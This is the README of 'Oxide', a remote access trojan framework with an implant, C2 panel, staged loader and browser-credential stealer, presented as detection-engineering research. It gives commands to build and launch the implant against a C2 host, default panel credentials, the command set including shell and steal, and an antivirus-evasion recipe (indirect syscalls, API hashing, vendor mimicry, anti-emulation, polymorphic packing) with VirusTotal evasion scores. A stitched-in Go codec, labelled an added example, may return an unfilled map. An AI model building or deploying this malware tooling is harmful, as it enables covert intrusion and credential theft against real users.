Cross-platform RAT framework for security research and detection engineering.
Built to demonstrate threat actor TTPs at the code level. Every component ships with paired YARA rules, Sigma rules, network signatures, and IR playbooks.
All testing occurs in an isolated VM lab (host-only network, no internet bridge).
Default C2 address is localhost. See DISCLAIMER.md.
Stage1 loader: 1/70 VirusTotal same-day on 2026-05-07. Single hit: Rising RDML (Chinese AV ML, generic Kryptik label). Microsoft Defender, BitDefender cluster, SentinelOne, CrowdStrike, Kaspersky, ESET, Sophos, Symantec: undetected. Scan · Per-engine breakdown · Detection screenshot · Behavior screenshot
A reference implementation of a modern RAT framework used to:
- Understand implant-panel communication at the protocol level
- Build detection rules against known behaviour, not guesswork
- Run purple team exercises with documented attack and defend artifacts
Reference architecture: AsyncRAT (C#, 2019). Oxide modernises it: Rust implant, cross-platform persistence, web panel, staged loader, standalone stealer.
| Repo | Role | Language |
|---|---|---|
| oxide (this) | Implant + C2 panel + detection | Rust + Python |
| oxide-loader | 3-stage delivery chain | C + Rust |
| oxide-stealer | Browser credential extraction | Rust |
| oxide-infra | Lab infrastructure automation | Terraform + Ansible |
Prerequisites: Rust stable, Python 3.11+, libvirt/KVM, gcc

```bash
bash lab-setup/gen_certs.sh
cargo build -p oxide-implant
cd panel && pip install -e . && python -m panel.panel.main --web-port 8080 --c2-port 4444
OXIDE_C2_HOST=10.10.100.1 ./target/debug/oxide-implant
```

Open http://localhost:8080 (admin / oxide).
Wire format: `[4-byte LE length][AES-256-GCM encrypted JSON]` over TLS 1.3.
Command types: shell, file_list, file_download, screenshot, process_list, persist_status, persist_remove, steal.
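As an added example (not the project's own code; written in Go for its standard-library AES-GCM rather than the implant's Rust or the panel's Python), a reference codec for the framing above that a lab test harness could use to decode captured frames after TLS termination: it validates the length field before allocating and fails closed on a bad authentication tag. The nonce placement (12 bytes ahead of the ciphertext), the 1 MiB cap and the `newGCM` key helper are assumptions the page does not specify.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"encoding/json"
	"errors"
	"io"
)

// Assumed layout: [4-byte LE length][12-byte nonce][AES-256-GCM ciphertext||tag]. The page fixes
// only the length prefix and AES-256-GCM; nonce placement and the 1 MiB size cap are assumptions.
const nonceSize, tagSize, maxFrame = 12, 16, 1 << 20

var errBadLength = errors.New("frame length outside [nonce+tag, maxFrame]")

// newGCM builds the AEAD for a session key; a 32-byte key selects AES-256.
func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil { return nil, err }
	return cipher.NewGCM(block)
}

// encodeFrame serialises msg as JSON, seals it under a fresh random nonce and prefixes the LE length.
func encodeFrame(gcm cipher.AEAD, msg map[string]any) ([]byte, error) {
	plain, err := json.Marshal(msg)
	if err != nil { return nil, err }
	body := make([]byte, nonceSize)
	if _, err := rand.Read(body); err != nil { return nil, err }
	body = gcm.Seal(body, body[:nonceSize], plain, nil) // ciphertext+tag appended after the nonce
	frame := make([]byte, 4, 4+len(body))
	binary.LittleEndian.PutUint32(frame, uint32(len(body)))
	return append(frame, body...), nil
}

// readFrame reads one frame from r, checking the length field before allocating or decrypting;
// it fails closed on a bad tag (tampering or wrong key) or on non-JSON plaintext.
func readFrame(r io.Reader, gcm cipher.AEAD) (msg map[string]any, err error) {
	var hdr [4]byte
	if _, err = io.ReadFull(r, hdr[:]); err != nil { return nil, err }
	n := binary.LittleEndian.Uint32(hdr[:])
	if n < nonceSize+tagSize || n > maxFrame { return nil, errBadLength }
	body := make([]byte, n)
	if _, err = io.ReadFull(r, body); err != nil { return nil, err }
	plain, err := gcm.Open(nil, body[:nonceSize], body[nonceSize:], nil)
	if err != nil { return nil, err }
	return msg, json.Unmarshal(plain, &msg)
}
```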
- Upload the oxide-stealer binary: `POST /api/staging/upload` (no `stage_number`)
- Click Steal in the panel bot detail view
- Implant downloads the binary from staging, validates its SHA-256, executes it as a subprocess
- Credentials appear in the Credentials tab
All techniques in detection/COVERAGE_MATRIX.md.
```text
detection/
├── sigma/     15 rules: persistence, commands, C2, credential access, tool staging
├── yara/      3 rules
├── network/   Zeek, Suricata, JA3/JA4
└── ir/        5 IR playbooks
```
```bash
cargo test
pytest panel/tests/ -v
pytest tests/vm/ -v   # requires VMs (see tests/vm/README.md)
```

```text
oxide/
├── implant/     Rust implant
├── shared/      Shared crypto + packet types
├── panel/       Python/FastAPI C2 panel
├── detection/   YARA, Sigma, network, IR
├── docs/        Architecture and protocol docs
├── tests/vm/    VM integration tests (libvirt)
└── lab-setup/   Certificate generation
```
- oxide-loader - 3-stage delivery chain
- oxide-stealer - Browser credential extraction
- oxide-infra - Lab infrastructure (Terraform + Ansible)
| Binary | Detections | Date | Link |
|---|---|---|---|
| stage1 loader (RtkAudHlpr.exe, polymorphic seed 4242, signed lab CA) | 1/70 | 2026-05-07 | scan |
| oxide-implant (Windows x86_64) | 5/72 | earlier | scan |
Stage1 1/70 (2026-05-07). Single hit: Rising RDML (Chinese AV ML, generic Trojan.Kryptik label). Microsoft Defender, Bitdefender cluster, SentinelOne static AI, CrowdStrike Falcon, Kaspersky, ESET-NOD32, Sophos, Symantec, Cynet, Trellix, DeepInstinct, Bkav Pro: undetected. Per-engine breakdown, screenshots, and 14-day drift watch schedule in docs/vt-scans/v1.0-stage1-S40-seed4242.md.
VT Behavior tab final state (170 min after submission, all 4 sandboxes complete):
| Field | Value |
|---|---|
| Detections | NOT FOUND |
| IDS Rules | NOT FOUND |
| Sigma Rules | NOT FOUND |
| Dropped Files | NOT FOUND |
| Mitre Signatures | 1 LOW, 2 INFO (capability tags T1027, T1071, T1129; not detection verdicts) |
| Network comms | 5 DNS, 1 IP (mostly sandbox-VM Windows / Office telemetry; binary's own fetch attempt fails as expected without lab C2) |
The S40 anti-emulation timing probe permits execution after the 9.5 s quiet window, the binary attempts its fetch path, the fetch fails in the sandbox (lab URL unreachable), and the binary exits gracefully. No file drops, no persistence writes, no privilege escalation, no injection observed by any of the 4 sandboxes. Detection score unchanged at 1/70.
Stage1 hardening pipeline (S33 to S40): compile-time string XOR + PEB walk + djb2 API resolution + Hell's Hall indirect syscalls + Realtek HD Audio Manager VERSIONINFO mimicry + lab CA self-sign + decoy IAT shaping + QPC/Sleep + CPU-loop anti-emulation + polymorphic build. Source in oxide-loader/stage1/ and crypter/packer/. Each technique ships paired YARA + Sigma in detection/.
oxide-implant 5/72. Earlier measurement on the implant binary (different artifact, different threat surface). Heuristic/ML engines flag unsigned Rust PE shape; no major signature or behavioural detection. SHA256 69ba7de6d505dbf6c655895718e65d49088f673a7a798177bd5c3fe9eef4744d.
Reproducibility: the polymorphic packer is deterministic per --seed, so the stage1 SHA above is reproducible from source. Rust builds are not reproducible by default; the implant SHA will not match across rebuilds.
VT submission policy: same-day single submission per artifact. No cross-submission to AnyRun / Hybrid Analysis / Joe Sandbox / Triage. No prebuilt binaries attached to GitHub releases. See docs/vt-scans/ for per-submission records.
Honest disclosure of what is and is not validated end to end.
| Component | Status |
|---|---|
| Stage1 loader hardening (S33 to S40) | Code complete, VT-measured 1/70 on 2026-05-07 |
| Polymorphic packer (crypter/packer/) | Code complete, 38/38 mock tests pass, deterministic per seed verified |
| Benchmark harness (tests/benchmark/) | Code complete, 38/38 mock tests pass, real-lab fixture refresh deferred |
| Lab IaC (oxide-infra repo, S36) | Code complete, runtime not validated. 6 known issues documented in oxide-infra/docs/lab/TROUBLESHOOTING.md. |
| make benchmark SCENARIO=full_chain against real Defender + Wazuh + Zeek | Pending. Requires lab bring-up + harness fixture refresh. |
| DETECTION_BASELINE.md (per-TTP coverage + dwell time) | Pending. Generated by benchmark harness once real-lab run completes. |
| Public blog post / screencast | Not produced. |
| Prebuilt binaries on GitHub release | Not produced. Source-only by policy. |
The stage1 0/72 path (S33-S40) is independent of the lab benchmark path (S36-S37-S38 thread B). The 1/70 result above measures the loader against static and lightweight-dynamic VT engines. Full closed-loop measurement against live EDR is the next milestone (v1.0 final).